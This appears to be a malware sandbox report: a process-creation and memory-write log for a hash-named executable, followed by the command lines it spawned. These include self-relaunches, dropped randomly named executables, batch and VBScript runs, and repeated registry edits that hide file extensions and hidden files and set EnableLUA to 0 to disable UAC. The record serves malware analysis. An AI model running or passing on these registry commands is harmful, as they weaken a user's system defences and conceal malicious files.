PID 2196 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 2196 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 2196 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 2196 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 2544 wrote to memory of 2600 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe
PID 2544 wrote to memory of 2600 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe
PID 2544 wrote to memory of 2600 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe
PID 2544 wrote to memory of 2600 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe
PID 2196 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2196 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2196 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2196 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2196 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2196 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2196 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2196 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2196 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2196 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2196 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2196 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2600 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 2956 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe
PID 1872 wrote to memory of 2956 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe
PID 1872 wrote to memory of 2956 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe
PID 1872 wrote to memory of 2956 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe
PID 2600 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2600 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2600 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2600 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2600 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2600 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2600 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2600 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2600 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2600 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2600 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2600 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2600 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 1996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2896 wrote to memory of 1996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2896 wrote to memory of 1996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2896 wrote to memory of 1996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2956 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 2956 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 2956 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 2956 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 2016 wrote to memory of 2304 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe
PID 2016 wrote to memory of 2304 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe
PID 2016 wrote to memory of 2304 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe
PID 2016 wrote to memory of 2304 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

Processes

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

"C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe"

C:\Users\Admin\mkcUkYkA\KGAQwQEs.exe

"C:\Users\Admin\mkcUkYkA\KGAQwQEs.exe"

C:\ProgramData\YKcAIoYs\DGQIEEQU.exe

"C:\ProgramData\YKcAIoYs\DGQIEEQU.exe"

C:\ProgramData\ogogoYAQ\pSoMwskA.exe

C:\ProgramData\ogogoYAQ\pSoMwskA.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\EEMUcIwc.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\HsMkwEQc.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\fWsIoEAQ.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\XgEIoQEk.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\laUgUQoA.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ZIUgUIQI.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\EacgwQcI.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\wUYcsgoo.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\KIYcckUU.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\IwoEccEQ.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\VGYUoQUM.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\zqIAQYkQ.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\bsgUEsgQ\wogYwAcY.exe

"C:\Users\Admin\bsgUEsgQ\wogYwAcY.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2944 -s 88

C:\ProgramData\KcEsUAsg\YigQsUoE.exe

"C:\ProgramData\KcEsUAsg\YigQsUoE.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 92

C:\ProgramData\IYYUUIYg\ASUAQooE.exe

C:\ProgramData\IYYUUIYg\ASUAQooE.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1560 -s 44

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

